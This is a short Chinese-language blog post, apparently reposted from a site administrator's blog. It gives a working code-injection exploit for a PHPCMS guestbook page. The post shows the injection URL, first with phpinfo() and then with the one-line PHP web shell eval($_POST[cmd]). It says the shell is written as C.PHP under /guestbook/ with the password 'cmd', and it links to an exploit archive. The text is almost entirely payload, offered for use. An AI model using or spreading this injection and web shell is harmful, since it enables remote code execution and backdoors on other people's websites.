guestbook/index.php?keywords=test&&page=3&${${phpinfo()}}
phpinfo替換成<?php eval($_POST[cmd])?>
<?php eval($_POST[cmd])?>
index.php?keywords=test&&page=3&${${<?php eval($_POST[cmd])?>}}
在/guestbook/目錄下生成C.PHP用一句話連 ..密碼cmd
http://www.dosjj.com//uploadfiles/phpcms_exploit_30717.rarphp
文章如轉載,請註明轉載自【網管小王的獨立博客】:http://www.5iadmin.com/ide